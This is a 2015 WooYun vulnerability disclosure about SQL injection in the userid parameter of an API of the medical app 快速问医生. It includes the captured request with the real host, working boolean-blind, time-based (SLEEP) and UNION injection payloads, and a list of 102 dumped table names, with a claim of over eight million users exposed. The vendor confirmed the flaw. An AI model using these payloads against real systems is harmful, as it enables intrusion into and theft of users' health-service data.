当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0147180

漏洞标题:快速问医生某处存在SQL注入(涉及大量用户数据含密码)

相关厂商:快速问医生

漏洞作者: Hancock

提交时间:2015-10-16 17:50

修复时间:2015-12-03 08:38

公开时间:2015-12-03 08:38

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:18

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-16: 细节已通知厂商并且等待厂商处理中
2015-10-19: 厂商已经确认,细节仅向厂商公开
2015-10-29: 细节向核心白帽子及相关领域专家公开
2015-11-08: 细节向普通白帽子公开
2015-11-18: 细节向实习白帽子公开
2015-12-03: 细节向公众公开

简要描述:

快速问医生某处存在SQL注入

详细说明:

APP抓包:

GET /v6/credit/user_level?userid=44738151&openid=oklWyjFW3Nx03Qsn%2FdrJvw%3D%3D&wechat_id=android&uuid=862620029971316 HTTP/1.1
Host: zys.iapp.120.net
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
X-Requested-With: com.ts.zys
User-Agent: android 4.1.1;862620029971316;zys 7.8.2;MI 2S zhjkyzYs safari webkit ;uname(18888888888);Mozilla/5.0 (Linux; U; Android 4.1.1; zh-cn; MI 2S Build/JRO03L) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN, en-US
Accept-Charset: utf-8, iso-8859-1, utf-16, *;q=0.7


参数userid

---
Parameter: userid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: userid=44738151' AND 3676=3676 AND 'XFdT'='XFdT&openid=oklWyjFW3Nx03Qsn/drJvw==&wechat_id=android&uuid=862620029971316
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: userid=44738151' AND (SELECT * FROM (SELECT(SLEEP(5)))tJxI) AND 'Yduf'='Yduf&openid=oklWyjFW3Nx03Qsn/drJvw==&wechat_id=android&uuid=862620029971316
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: userid=-3842' UNION ALL SELECT CONCAT(0x717a6a6a71,0x715751624d64506c4f67,0x71787a7871)-- &openid=oklWyjFW3Nx03Qsn/drJvw==&wechat_id=android&uuid=862620029971316
---


漏洞证明:

Database: app_user
[102 tables]
+-------------------------------+
| ask_mobile_user |
| hd_address |
| hd_prize |
| hd_user |
| jf_help |
| jf_item |
| jf_prize |
| jf_user |
| jf_user_address |
| jf_user_cost_detail |
| jf_user_cost_detail_1 |
| jf_user_cost_detail_201302 |
| jf_user_cost_detail_201303 |
| jf_user_cost_detail_201304 |
| jf_user_dynamic |
| jf_user_invite |
| jf_user_prize |
| jf_user_prize_address |
| mapp_collect_disease |
| mapp_collect_doctor |
| mapp_collect_question |
| mapp_doctor |
| mapp_doctor_group |
| mapp_pay |
| mapp_pay_list |
| mapp_pay_logs |
| mapp_pay_order_list |
| mapp_pay_record |
| mapp_uid_uuid_mapping |
| mapp_user |
| mapp_user_action_logs |
| mapp_user_active |
| mapp_user_ask_error |
| mapp_user_ask_normal |
| mapp_user_asknums |
| mapp_user_asknums_2012 |
| mapp_user_connect |
| mapp_user_err |
| mapp_user_ext |
| mapp_user_give_liuna |
| mapp_user_login_times |
| mapp_user_pay |
| mapp_user_score_save |
| mapp_user_uuid_relation |
| mapp_user_version |
| mapp_user_wxinfo |
| mapp_user_zhs_relation |
| mapp_userid_gtt |
| mapp_uuid_drivers |
| mapp_version_logs |
| mapp_version_user_logs_2012 |
| mapp_version_user_logs_201301 |
| mapp_version_user_logs_201302 |
| mapp_version_user_logs_201303 |
| mapp_version_user_logs_201304 |
| mapp_version_user_logs_201305 |
| mapp_version_user_logs_201306 |
| mapp_version_user_logs_201307 |
| mapp_version_user_logs_201308 |
| mapp_version_user_logs_201309 |
| mapp_version_user_logs_201310 |
| mapp_version_user_logs_201311 |
| mapp_version_user_logs_201312 |
| mapp_version_user_logs_201401 |
| mapp_version_user_logs_201402 |
| mapp_version_user_logs_201403 |
| mapp_version_user_logs_201404 |
| mapp_version_user_logs_201405 |
| mapp_version_user_logs_201406 |
| mapp_version_user_logs_201407 |
| mapp_version_user_logs_201408 |
| mapp_version_user_logs_201409 |
| mapp_version_user_logs_201410 |
| mapp_version_user_logs_201411 |
| mapp_version_user_logs_201412 |
| mapp_version_user_logs_201501 |
| mapp_version_user_logs_201502 |
| mapp_version_user_logs_201503 |
| mapp_version_user_logs_201504 |
| mapp_version_user_logs_201505 |
| mapp_version_user_logs_201506 |
| mapp_version_user_logs_201507 |
| mapp_version_user_logs_201508 |
| mapp_version_user_logs_201509 |
| mapp_version_user_logs_201510 |
| mapp_version_user_logs_201511 |
| mapp_version_user_logs_201512 |
| mapp_version_user_logs_201601 |
| mapp_version_user_logs_201602 |
| mapp_version_user_logs_201603 |
| syn_collect_disease |
| user_collect |
| user_exp_score_detail |
| user_sign |
| user_sign_log |
| wx_user_cj |
| wx_user_flag |
| wxuser_dis_class |
| wxuser_tags |
| zys_uuid_token |
| zys_uuid_uid |
| zys_wrong_token |
+-------------------------------+


涉及800多万用户

3.gif

修复方案:

版权声明:转载请注明来源 Hancock@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-10-19 08:38

厂商回复:

漏洞确认,感谢

最新状态:

暂无


漏洞评价:

评论

  1. 2015-10-16 18:12 | Hancock ( 普通白帽子 | Rank:492 漏洞数:83 )

    为毛要加后面的标题、对厂商影响不好啊

  2. 2015-10-16 18:15 | JGHOOluwa ( 普通白帽子 | Rank:353 漏洞数:57 | 就是来看看大牛们如何超神的^-^)

    @Hancock 这厂商很好很客气的~